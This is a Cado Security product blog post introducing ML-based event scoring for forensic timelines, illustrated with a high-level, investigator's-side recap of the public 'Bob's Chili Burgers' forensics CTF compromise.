Augmenting, Not Automating, SOC Analysts with Machine Learning
As businesses and organizations around the world continue to adopt cloud at growing rates, cyber actors have recognized and responded to exploit this opportunity in-kind. These trends have led to the increase in both the scale and complexity of cyberattacks, thus the challenges presented to the Security Operations Centre (SOC) are ever more challenging. Faced with a growing volume of security alerts to investigate, and a need to act quickly and decisively, something has to change.
At Cado Security, we’ve decided to invest in Machine Learning (ML) technology to help you meet these challenges. Building on our extensive use of automation, these new ML capabilities will help you in two key ways. First, by presenting you with the most pertinent contextualized information, we will enable your SOC analysts to make accurate and rapid decisions while triaging the overwhelming number of security alerts they see every day. These capabilities will also enrich your forensic datasets and help you to delve deeply into them during more complex security investigations.
Your analysts are, and will always be, critical to the success of the SOC. However, in this day and age their responsibilities are incredibly challenging and are only getting more so. We believe that through the judicious use of ML, their expertise can be augmented, leading to faster and more accurate decision making.
Introducing Cado’s ML Augmented Investigations
The Cado Security platform offers unparalleled depth of data to support security operations, investigations, and incident response. That depth of data presents challenges however, and there is simply too much of it to reasonably expect anyone to be able to look at it all. Tools and techniques are essential to help you make sense of it.
We have enhanced the platform's underlying algorithms to help you prioritize what to look at, both in the context of automated workflows and during manual investigations. We’ll save the technical details for another blog post, but briefly, we have augmented the forensic timeline by adding a “score” to every event. This scoring system was built using contemporary machine learning approaches, data from real world cyber compromises, and the knowledge and experience of our expert incident response/forensics practitioners at Cado Security.
Where can you see these enhancements?
- AI Investigator, a LLM summary of events within an Investigation
- Automated Investigation, a machine learning model that scores and prioritizes activity across a system
- Timeline Search, the full fire-hose of data that both powers our higher level capabilities and allows analysts to dive in deeper.
Let’s briefly explore these features.
Firstly, when considering a new project in the Cado platform, you’ll likely want to ascertain a high-level view of what has happened. See (1) in the screenshot above. Using our new ML techniques, we shortlist the entire timeline of events down to just the most pertinent information. This timeline shortlist is then summarized into natural language (see a recent blog post for further details) to give you a 10,000 foot view of the project, and ideally a decent idea of what has happened.
Like any automated process, this feature can suffer from the so-called garbage in, garbage out principle. The quality of this human-readable summary is dependent on the quality of the data we feed into it. These new ML capabilities are an intentional investment by Cado Security to improve the quality of this data selection process, and ultimately, your ability to make accurate and rapid triage decisions.
Despite our best efforts with the AI Investigator, your analysts will at times have some remaining questions. The Automated Investigation feature, see (2) in the screenshot above, will allow them to explore the timeline shortlist described above.
Finally, there will be security incidents you face that are inherently more complicated, where greater analyses and investigation is warranted. In such cases, our timeline search feature (see 3a in the screenshot above) lets you harness the full power of the Cado platform to investigate the forensic captures of your datasets.
There are two product enhancements to call out here.
You may use our query language to investigate the timeline, which now can include clauses on the score described above. See 3b in the screenshot above. Documentation on our query language is available here. As an example, you might want to try the following query:
auto_investigate_score: [0.9 TO 1.0]
This query will show you all events that have a relatively high score, as the possible range is from 0 (almost certainly uninteresting) to 1 (almost certainly interesting).
Additionally, your analysts may prefer to utilize our faceted search capability, which allows them to interactively build a timeline query using our user interface. See 3c in the screenshot above, which gives insight into the distribution of scores across the timeline.
How can I try this out?
While we continue to develop and refine these new capabilities, we have released an initial version under our package of experimental features. This is to allow you to opt-in to test it out if you like, and to gather your feedback from real-world testing. Please let us know what you think.
You will need to enable this in the settings of your Cado platform instance.
Settings -> Experiments -> Next-Gen Automated Investigations
Here is a very quick example scenario to help illustrate this new ML based approach.
You may be familiar with the forensics Capture the Flag (CTF) problem created by Andrew Swartwood, Bob’s Chili Burgers. You can find the original post here which includes the problem description.
SPOILER ALERT! Please stop reading here if you want to try this yourself first.
Briefly, Bob, the owner of Bob’s Chili Burgers LLC runs a website. Bob has started to receive complaints about his website infecting customers with malware.
The attacker has achieved initial access to the web server via an SSH-based password guessing attack, made some changes to the legitimate website (iframe injection to serve some executable malware) and tried to hide evidence of their activity. The attacker has also created a new account and changed some passwords to allow them to maintain persistent access into the future.
Upon importing these forensic artifacts into the Cado platform, we can see that the timeline consists of 226,167 events. Quite a lot to have to sift through! The Automated Investigation view will show you a small number of events that are more likely to be pertinent to your investigation into this compromise; using our new ML model to select the events.
Here are some screenshots, truncated for brevity.
In our case, we are left with 28 events (highlighted with a green circle above). Now, Cado Security’s existing content-based alarm system helps you to see much of the exploitation already (highlighted in black boxes above):
- Password changes for the root user account
- The iframe injection into the legitimate website, and the malware that it was then made to serve to visitors (setup.exe)
- Suspected timestomping and covering of the attacker’s tracks
- etc.
Our new model can also add to this picture to help you understand what has happened quickly. In this case, by identifying the creation of a new user account that the attacker used for ongoing access (radvlad) and the changing of the password for Bob’s account. These can be seen highlighted in red boxes.
Future Work
This blog describes our first iteration of deploying ML augmented analytics to the Cado platform, however, it won’t be the last. We look forward to sharing more updates with you in the future as we continue to invest in this technology, helping you to understand the complete attacks facing your organization, and act with confidence.
We plan to apply a continuous improvement methodology in the following areas:
- Designing new ways to expose the results and recommendation of these ML models to the you, enhancing the user experience
- Harnessing the power of these predictive systems within our automated processing systems
- Improving the quality and performance of the underlying ML models - to make better/more accurate predictions
If you have any feedback, or requests, we’d love to hear from you!
More from the blog
View All PostsClosing the Skills Gap in Incident Response with Cado’s Automation
October 10, 2024Deciphering AWS GuardDuty Alerts: A Technical Guide
October 19, 2023How Cado Enables Investigations in Distroless Container Environments
June 12, 2024Subscribe to Our Blog
To stay up to date on the latest from Cado Security, subscribe to our blog today.